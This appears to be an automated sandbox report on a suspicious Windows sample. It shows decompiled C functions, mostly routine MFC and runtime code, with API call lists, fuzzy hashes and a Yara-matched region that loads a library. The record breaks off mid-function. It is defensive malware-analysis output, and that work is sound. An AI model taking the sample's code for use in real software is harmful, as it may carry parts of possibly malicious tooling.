                  						_t34 = E0040EE68(_t30, _t32, _t34, _t36, _t32);
                  						if(_t34 != 0) {
                  							_t20 =  *((intOrPtr*)(_v8 + 0x20));
                  							if( *((intOrPtr*)(_v8 + 0x20)) != _t32 && E00408105(_t20, _t32) != 0) {
                  								_t22 = GetWindowLongA(_t32, 0xfffffff0);
                  								if(_a4 != 0) {
                  									__eflags = _t22 & 0x18000000;
                  									if(__eflags == 0) {
                  										__eflags =  *(_t34 + 0x3c) & 0x00000002;
                  										if(__eflags != 0) {
                  											__eflags =  *(_v8 + 0xb4);
                  											if(__eflags == 0) {
                  												ShowWindow(_t32, 4);
                  												_t14 = _t34 + 0x3c;
                  												 *_t14 =  *(_t34 + 0x3c) & 0xfffffffd;
                  												__eflags =  *_t14;
                  											}
                  										}
                  									}
                  								} else {
                  									if((_t22 & 0x18000000) == 0x10000000) {
                  										ShowWindow(_t32, 0);
                  										 *(_t34 + 0x3c) =  *(_t34 + 0x3c) | 0x00000002;
                  									}
                  								}
                  							}
                  						}
                  						_t17 = GetWindow(_t32, 2);
                  						_t32 = _t17;
                  					} while (_t32 != 0);
                  					goto L14;
                  				}
                  			}











                  APIs
                  • GetDesktopWindow.USER32 ref: 004081AA
                  • GetWindow.USER32(00000000), ref: 004081B1
                  • GetWindowLongA.USER32 ref: 004081ED
                  • ShowWindow.USER32(00000000,00000000), ref: 00408208
                  • ShowWindow.USER32(00000000,00000004), ref: 0040822C
                  • GetWindow.USER32(00000000,00000002), ref: 00408235
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Show$DesktopLong
                  • String ID:
                  • API String ID: 3178490500-0
                  • Opcode ID: 2adaebdcccac595bc1267bf586bd64cc53134c589bb79a51c25d8a8f8971210c
                  • Instruction ID: 421dcce19a151290b000e9d638100705882381d2d218f3d77e8fe81ceb2f36eb
                  • Opcode Fuzzy Hash: 2adaebdcccac595bc1267bf586bd64cc53134c589bb79a51c25d8a8f8971210c
                  • Instruction Fuzzy Hash: 0B110431440A04AFD721C7258E89F2F36B5EB917A5FA105BEF881B62C4CF3CDC018A19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 72%
                  			E004252FF(void* __ecx) {
                  				struct tagMSG _v32;
                  				void* __ebx;
                  				int _t20;
                  				intOrPtr _t23;
                  				int _t30;
                  				intOrPtr _t31;
                  				void* _t32;
                  				void* _t33;
                  				void* _t36;
                  				void* _t38;
                  
                  				_t32 = PeekMessageA;
                  				_t38 = __ecx;
                  				while(PeekMessageA( &_v32, 0, 0xf, 0xf, 0) != 0) {
                  					_t20 = GetMessageA( &_v32, 0, 0xf, 0xf);
                  					if(_t20 != 0) {
                  						DispatchMessageA( &_v32);
                  						continue;
                  					}
                  					return _t20;
                  				}
                  				_t23 =  *((intOrPtr*)(_t38 + 0x68));
                  				 *((intOrPtr*)(_t38 + 0x70)) =  *((intOrPtr*)(_t23 + 0x88));
                  				 *(_t38 + 0x78) =  *(_t23 + 0x84) & 0x0000f000;
                  				SetRectEmpty(_t38 + 0xc);
                  				 *((intOrPtr*)(_t38 + 0x20)) = 0;
                  				 *((intOrPtr*)(_t38 + 0x1c)) = 0;
                  				 *((intOrPtr*)(_t38 + 0x24)) = 0;
                  				 *((intOrPtr*)(_t38 + 0x7c)) = 0;
                  				 *((intOrPtr*)(_t38 + 0x80)) = 0;
                  				_t33 = E0040EE3C(_t32,  *((intOrPtr*)(_t23 + 0x88)), GetDesktopWindow());
                  				_t30 = LockWindowUpdate( *(_t33 + 0x20));
                  				_t36 = _t33;
                  				if(_t30 == 0) {
                  					_push(3);
                  				} else {
                  					_push(0x403);
                  				}
                  				_push(0);
                  				_t31 = E00425132(_t36);
                  				 *((intOrPtr*)(_t38 + 0x84)) = _t31;
                  				return _t31;
                  			}














                  APIs
                  • GetMessageA.USER32 ref: 0042531F
                  • DispatchMessageA.USER32 ref: 00425331
                  • PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 00425341
                  • SetRectEmpty.USER32(?), ref: 00425365
                  • GetDesktopWindow.USER32 ref: 0042537D
                  • LockWindowUpdate.USER32(?,00000000), ref: 0042538E
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                  • String ID:
                  • API String ID: 1192691108-0
                  • Opcode ID: aace2d7f96b7781ae3f89cd1ea8af059833168b570cc0a46978888ca4ec1f2a3
                  • Instruction ID: 49a96046c5d33274eb4831c9af67dae449dda2e98a187f2c04bc5722c74187fb
                  • Opcode Fuzzy Hash: aace2d7f96b7781ae3f89cd1ea8af059833168b570cc0a46978888ca4ec1f2a3
                  • Instruction Fuzzy Hash: CB117F76A00B01ABD720DFA6DC48B67BBFCBB44740F40443AE696D76A1EB74D4019B18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 63%
                  			E0040B025(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t28;
                  				long _t31;
                  				void* _t33;
                  				void* _t38;
                  				void* _t58;
                  				void* _t59;
                  
                  				_t52 = __edx;
                  				_push(0x18);
                  				E00431ACE(E0044AEBE, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t59 - 0x1c)) = __ecx;
                  				_push(_t59 - 0x18);
                  				_push(_t59 - 0x20);
                  				_push( *((intOrPtr*)(_t59 + 0xc)));
                  				_push(0x3e8);
                  				L00447488();
                  				_t28 = GlobalLock( *(_t59 - 0x18));
                  				E004014C0(_t59 - 0x14, _t52);
                  				 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
                  				 *(_t59 - 4) = 1;
                  				E00402830(_t52, __edi, _t28);
                  				_t31 = GlobalUnlock( *(_t59 - 0x18));
                  				 *(_t59 - 4) =  *(_t59 - 4) & 0x00000000;
                  				_push( *(_t59 - 0x18));
                  				_push(0x8000);
                  				_push(0x3e4);
                  				_push(0x3e8);
                  				_push( *((intOrPtr*)(_t59 + 0xc)));
                  				L00447482();
                  				_t54 =  *((intOrPtr*)(_t59 - 0x1c));
                  				PostMessageA( *(_t59 + 8), 0x3e4,  *( *((intOrPtr*)(_t59 - 0x1c)) + 0x20), _t31);
                  				_t33 = E00412C5B( *((intOrPtr*)(_t59 - 0x1c)));
                  				_t61 = _t33;
                  				if(_t33 != 0) {
                  					_t58 = E0040A688(_t59 - 0x14);
                  					_t38 = E0041F363(__ebx, _t54, _t58, _t61);
                  					_t52 =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 4))));
                  					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t38 + 4)))) + 0xa0))(_t58);
                  					E0040A356(_t59 - 0x14, 0xffffffff);
                  				}
                  				E004010B0( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
                  				return E00431B73(0);
                  			}










                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0040B02C
                  • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 0040B044
                  • GlobalLock.KERNEL32 ref: 0040B04C
                  • GlobalUnlock.KERNEL32(?,00000000), ref: 0040B070
                  • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 0040B090
                  • PostMessageA.USER32 ref: 0040B0A0
                    • Part of subcall function 00412C5B: IsWindowEnabled.USER32(?), ref: 00412C64
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: GlobalParam$EnabledH_prolog3_catchLockMessagePostReuseUnlockUnpackWindow
                  • String ID:
                  • API String ID: 4187826474-0
                  • Opcode ID: 7712ed31451a7ab43eb35c33b2217e765a9a71d402a23eff9c4a25d2ad28ad7d
                  • Instruction ID: 9d41415674a00b450912fe41e8faaea42a91231a293c7cca4ef03f372c888be7
                  • Opcode Fuzzy Hash: 7712ed31451a7ab43eb35c33b2217e765a9a71d402a23eff9c4a25d2ad28ad7d
                  • Instruction Fuzzy Hash: 8911A235900109AFDF01EBA1CD46AFE7B74BF04315F14422AB515B72E1DB389A15CBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00426668(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
                  				long _t21;
                  				void* _t28;
                  
                  				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                  					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x68));
                  				}
                  				if(_a8 != 0) {
                  					_t28 = E0042652C(__ecx, _a4);
                  					if(_a12 != 0) {
                  						if(_t28 == 0) {
                  							L3:
                  							return 0;
                  						}
                  						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
                  						L10:
                  						RegCloseKey(_t28);
                  						return 0 | _t21 == 0x00000000;
                  					}
                  					if(_t28 == 0) {
                  						goto L3;
                  					}
                  					_t21 = RegDeleteValueA(_t28, _a8);
                  					goto L10;
                  				}
                  				_t28 = E00426499(__ecx);
                  				if(_t28 != 0) {
                  					_t21 = RegDeleteKeyA(_t28, _a4);
                  					goto L10;
                  				}
                  				goto L3;
                  			}






                  APIs
                  • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0042668E
                  • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 004266AE
                  • RegCloseKey.ADVAPI32(00000000), ref: 004266D9
                    • Part of subcall function 00426499: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 004264C9
                    • Part of subcall function 00426499: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004264EC
                    • Part of subcall function 00426499: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00426508
                    • Part of subcall function 00426499: RegCloseKey.ADVAPI32(?), ref: 00426518
                    • Part of subcall function 00426499: RegCloseKey.ADVAPI32(?), ref: 00426522
                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 004266F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                  • String ID:
                  • API String ID: 1886894508-0
                  • Opcode ID: cf54b3c77ee718f75f42add01bc63d46b6446b20ccf5db03060ca3b177b08ec9
                  • Instruction ID: 89b66a75d349d0838efd71de6006c1518052202ea5fbcc01f482d7d6114c7717
                  • Opcode Fuzzy Hash: cf54b3c77ee718f75f42add01bc63d46b6446b20ccf5db03060ca3b177b08ec9
                  • Instruction Fuzzy Hash: F011A036601235FBCF221F61EC08BAE3B65BF04355F564426FD1599120CBBAC811DB9C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 77%
                  			E0042DB24(void* __ecx) {
                  				int _v8;
                  				char _v12;
                  				void* __ebx;
                  				void* __edi;
                  				int _t14;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t14 = GetDeviceCaps( *(__ecx + 8), 0xa);
                  				_v12 = GetDeviceCaps( *(__ecx + 8), 8);
                  				_v8 = _t14;
                  				E0042D602(__ecx,  &_v12);
                  				SetMapMode( *(__ecx + 4), 1);
                  				SetWindowOrgEx( *(__ecx + 4), 0, 0, 0);
                  				SetViewportOrgEx( *(__ecx + 4),  *(__ecx + 0x20),  *(__ecx + 0x24), 0);
                  				IntersectClipRect( *(__ecx + 4), 0xffffffff, 0xffffffff, _v12 + 2, _v8 + 2);
                  				return E0042DA25(_t14, __ecx, 0, 0);
                  			}









                  APIs
                  • GetDeviceCaps.GDI32(?,0000000A), ref: 0042DB3B
                  • GetDeviceCaps.GDI32(?,00000008), ref: 0042DB44
                    • Part of subcall function 0042D602: GetViewportExtEx.GDI32(?,?), ref: 0042D615
                    • Part of subcall function 0042D602: GetWindowExtEx.GDI32(?,?), ref: 0042D622
                  • SetMapMode.GDI32(?,00000001), ref: 0042DB5C
                  • SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 0042DB6A
                  • SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 0042DB7A
                  • IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 0042DB95
                    • Part of subcall function 0042DA25: GetViewportExtEx.GDI32(00000000,?), ref: 0042DA40
                    • Part of subcall function 0042DA25: GetWindowExtEx.GDI32(00000000,?), ref: 0042DA4D
                    • Part of subcall function 0042DA25: GetDeviceCaps.GDI32(00000000,00000058), ref: 0042DAAD
                    • Part of subcall function 0042DA25: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042DACA
                    • Part of subcall function 0042DA25: SetMapMode.GDI32(?,00000008), ref: 0042DAF0
                    • Part of subcall function 0042DA25: SetWindowExtEx.GDI32(?,?,?,00000000), ref: 0042DB01
                    • Part of subcall function 0042DA25: SetViewportExtEx.GDI32(?,?,?,00000000), ref: 0042DB12
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CapsDeviceViewportWindow$Mode$ClipIntersectRect
                  • String ID:
                  • API String ID: 1729379761-0
                  • Opcode ID: c8600ce221c2ec6a70bd7dad16ff7971a38c4859d90be0925a3898c37e9b66b8
                  • Instruction ID: 8536639afe39f5eb7b5e1cbf932ac324b1ac82a323fbb308fbb1dad4bb3e740d
                  • Opcode Fuzzy Hash: c8600ce221c2ec6a70bd7dad16ff7971a38c4859d90be0925a3898c37e9b66b8
                  • Instruction Fuzzy Hash: B8018431600614BBDB215B57DC4AD4BBFB9FFC9720B00852DF166921A0DAB1AC10CB24
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0041FEC0(struct HWND__* _a4) {
                  				void* __ebx;
                  				void* __edi;
                  				struct HWND__* _t3;
                  				struct HWND__* _t6;
                  				struct HWND__* _t8;
                  				void* _t10;
                  				struct HWND__* _t11;
                  
                  				_t3 = GetFocus();
                  				_t11 = _t3;
                  				if(_t11 != 0) {
                  					_t8 = _a4;
                  					if(_t11 == _t8) {
                  						L10:
                  						return _t3;
                  					}
                  					if(E0041FDA4(_t8, _t10, _t11, _t11, 3) != 0) {
                  						L5:
                  						if(_t8 == 0 || (GetWindowLongA(_t8, 0xfffffff0) & 0x40000000) == 0) {
                  							L8:
                  							_t3 = SendMessageA(_t11, 0x14f, 0, 0);
                  							goto L9;
                  						} else {
                  							_t6 = GetParent(_t8);
                  							_t3 = GetDesktopWindow();
                  							if(_t6 == _t3) {
                  								L9:
                  								goto L10;
                  							}
                  							goto L8;
                  						}
                  					}
                  					_t3 = GetParent(_t11);
                  					_t11 = _t3;
                  					if(_t11 == _t8) {
                  						goto L9;
                  					}
                  					_t3 = E0041FDA4(_t8, _t10, _t11, _t11, 2);
                  					if(_t3 == 0) {
                  						goto L9;
                  					}
                  					goto L5;
                  				}
                  				return _t3;
                  			}











                  APIs
                  • GetFocus.USER32(?,?,00404DAE,?), ref: 0041FEC6
                  • GetParent.USER32(00000000), ref: 0041FEEE
                    • Part of subcall function 0041FDA4: GetWindowLongA.USER32 ref: 0041FDC5
                    • Part of subcall function 0041FDA4: GetClassNameA.USER32(?,?,0000000A), ref: 0041FDDA
                  • GetWindowLongA.USER32 ref: 0041FF09
                  • GetParent.USER32(?), ref: 0041FF17
                  • GetDesktopWindow.USER32 ref: 0041FF1B
                  • SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0041FF2F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$LongParent$ClassDesktopFocusMessageNameSend
                  • String ID:
                  • API String ID: 3020784601-0
                  • Opcode ID: 7138e401b7d464fa63ed0106b9823c3ed7b2c2d69fbe47efeef8b4535bd2ed63
                  • Instruction ID: a3e0ee6632b80016e2cee3cc5ed10369111e6e6cb658273c54acccc958f9d77b
                  • Opcode Fuzzy Hash: 7138e401b7d464fa63ed0106b9823c3ed7b2c2d69fbe47efeef8b4535bd2ed63
                  • Instruction Fuzzy Hash: D501DB3220421333D7211B665C8DFBB2A5D6BD3750F19003BF505A3290DBA8CC87816C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E0043551B(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t48;
                  				intOrPtr _t57;
                  				void* _t58;
                  				void* _t61;
                  
                  				_t61 = __eflags;
                  				_t53 = __edx;
                  				_push(0x2c);
                  				_push(0x45e0e0);
                  				E00431818(__ebx, __edi, __esi);
                  				_t48 = __ecx;
                  				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                  				_t57 =  *((intOrPtr*)(_t58 + 8));
                  				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                  				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                  				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                  				 *((intOrPtr*)(_t58 - 0x28)) = E0043054B(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                  				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00436178(__ecx, __edx, _t55, _t61) + 0x88));
                  				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00436178(_t48, __edx, _t55, _t61) + 0x8c));
                  				 *((intOrPtr*)(E00436178(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
                  				 *((intOrPtr*)(E00436178(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                  				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                  				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                  				 *(_t58 - 4) = 1;
                  				 *((intOrPtr*)(_t58 - 0x1c)) = E004305F0(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                  				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                  				 *(_t58 - 4) = 0xfffffffe;
                  				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                  				E00435641(_t48, _t53, _t55, _t57, _t61);
                  				return E0043185D( *((intOrPtr*)(_t58 - 0x1c)));
                  			}







                  APIs
                  • __CreateFrameInfo.LIBCMT ref: 00435543
                    • Part of subcall function 0043054B: __getptd.LIBCMT ref: 00430559
                    • Part of subcall function 0043054B: __getptd.LIBCMT ref: 00430567
                  • __getptd.LIBCMT ref: 0043554D
                    • Part of subcall function 00436178: __getptd_noexit.LIBCMT ref: 0043617B
                    • Part of subcall function 00436178: __amsg_exit.LIBCMT ref: 00436188
                  • __getptd.LIBCMT ref: 0043555B
                  • __getptd.LIBCMT ref: 00435569
                  • __getptd.LIBCMT ref: 00435574
                  • _CallCatchBlock2.LIBCMT ref: 0043559A
                    • Part of subcall function 004305F0: __CallSettingFrame@12.LIBCMT ref: 0043063C
                    • Part of subcall function 00435641: __getptd.LIBCMT ref: 00435650
                    • Part of subcall function 00435641: __getptd.LIBCMT ref: 0043565E
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                  • String ID:
                  • API String ID: 1602911419-0
                  • Opcode ID: 270b4874b4146d5150989347aab07051d422c89617759b4d376d9bbcefeb06d0
                  • Instruction ID: 12163c9f5d774255b4c5aa6cddf76e7ce5817fe140a7e1809cc9b622f8e45688
                  • Opcode Fuzzy Hash: 270b4874b4146d5150989347aab07051d422c89617759b4d376d9bbcefeb06d0
                  • Instruction Fuzzy Hash: 56110A71C0020AEFDF00EFA5C846BAD7BB0FF09318F50956AF814A7252DB789A119F58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 38%
                  			E0041FE4A(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                  				struct tagRECT _v20;
                  				struct HWND__* _t12;
                  				struct HWND__* _t21;
                  
                  				ClientToScreen(_a4,  &_a8);
                  				_push(5);
                  				_push(_a4);
                  				while(1) {
                  					_t12 = GetWindow();
                  					_t21 = _t12;
                  					if(_t21 == 0) {
                  						break;
                  					}
                  					if(GetDlgCtrlID(_t21) != 0xffff && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
                  						GetWindowRect(_t21,  &_v20);
                  						_push(_a12);
                  						if(PtInRect( &_v20, _a8) != 0) {
                  							return _t21;
                  						}
                  					}
                  					_push(2);
                  					_push(_t21);
                  				}
                  				return _t12;
                  			}






                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Rect$ClientCtrlLongScreen
                  • String ID:
                  • API String ID: 1315500227-0
                  • Opcode ID: aaf4557226aed99c3d547442cdc0ccab5e13162b72004c03008042cfd5e9e743
                  • Instruction ID: 979a72b2d57e80b3412745ffee18be6cc6d8b60f5167ca6da8359f6ff8559c25
                  • Opcode Fuzzy Hash: aaf4557226aed99c3d547442cdc0ccab5e13162b72004c03008042cfd5e9e743
                  • Instruction Fuzzy Hash: 3C018F36100219BBCB219F56DC08EEF3B28FF56710F454532F915D21A1E734D9578A9C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E00429A19(void* __ecx) {
                  				void* _t13;
                  				struct HMENU__* _t14;
                  				void* _t15;
                  				struct HMENU__* _t16;
                  				void* _t17;
                  				intOrPtr _t19;
                  				void* _t29;
                  				void* _t33;
                  				void* _t34;
                  
                  				_t25 = __ecx;
                  				_t33 = __ecx;
                  				if( *((intOrPtr*)(__ecx + 0x28)) != 0) {
                  					__eax = DestroyMenu(__eax);
                  				}
                  				_t13 =  *(_t33 + 0x2c);
                  				if(_t13 != 0) {
                  					FreeResource(_t13);
                  				}
                  				_t14 =  *(_t33 + 0x30);
                  				if(_t14 != 0) {
                  					DestroyMenu(_t14);
                  				}
                  				_t15 =  *(_t33 + 0x34);
                  				if(_t15 != 0) {
                  					FreeResource(_t15);
                  				}
                  				_t16 =  *(_t33 + 0x38);
                  				if(_t16 != 0) {
                  					DestroyMenu(_t16);
                  				}
                  				_t17 =  *(_t33 + 0x3c);
                  				if(_t17 != 0) {
                  					FreeResource(_t17);
                  				}
                  				E004010B0( *((intOrPtr*)(_t33 + 0x64)) - 0x10, _t29);
                  				_t25 = _t33;
                  				_pop(_t33);
                  				_push(_t33);
                  				_t34 = _t25;
                  				_t19 =  *((intOrPtr*)(_t34 + 0x10));
                  				if(_t19 != 0) {
                  					_t19 =  *((intOrPtr*)(_t19 + 0x1c))();
                  				}
                  				 *(_t34 + 0x1c) =  *(_t34 + 0x1c) & 0x00000000;
                  				return _t19;
                  			}












                  APIs
                  • DestroyMenu.USER32(?,?,?,004171DF,00000004,00417244), ref: 00429A2D
                  • FreeResource.KERNEL32(?,?,?,004171DF,00000004,00417244), ref: 00429A37
                  • DestroyMenu.USER32(?,?,?,004171DF,00000004,00417244), ref: 00429A45
                  • FreeResource.KERNEL32(?,?,?,004171DF,00000004,00417244), ref: 00429A4F
                  • DestroyMenu.USER32(?,?,?,004171DF,00000004,00417244), ref: 00429A5D
                  • FreeResource.KERNEL32(?,?,?,004171DF,00000004,00417244), ref: 00429A67
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: DestroyFreeMenuResource
                  • String ID:
                  • API String ID: 2790856715-0
                  • Opcode ID: 8081848a1ddf500aaf7c4141dd612c7d736c7543525f0c36d1939d0ab3da03d1
                  • Instruction ID: 9dce847ac49ba06b3d19df9fb6a45dc263d23366e3dd4b2b53d37e8394955563
                  • Opcode Fuzzy Hash: 8081848a1ddf500aaf7c4141dd612c7d736c7543525f0c36d1939d0ab3da03d1
                  • Instruction Fuzzy Hash: D0F0EC357007509B9B20EF7BAE48E57B7ECBE44740745182EB846D3B60DA78EC018A29
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0231A857
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: $C}q$F6.;$JN$ZGd
                  • API String ID: 1029625771-657663392
                  • Opcode ID: b11da5ab64e63239f6ab3881d01cee195193e1828c6ef704a8b2ccf56672cb66
                  • Instruction ID: 1e725d639f674c3af74875233b5cb26bc99fde31fd1633272fd6a8f412dabe16
                  • Opcode Fuzzy Hash: b11da5ab64e63239f6ab3881d01cee195193e1828c6ef704a8b2ccf56672cb66
                  • Instruction Fuzzy Hash: 2C61A8B4C55369CBDB208F8199917CDBB74FB11304F6185C9D2A93B204EB740A86CF95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			E004128A9(void* __edx) {
                  				signed int _v8;
                  				void _v136;
                  				int _v140;
                  				int _v144;
                  				char _v148;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t21;
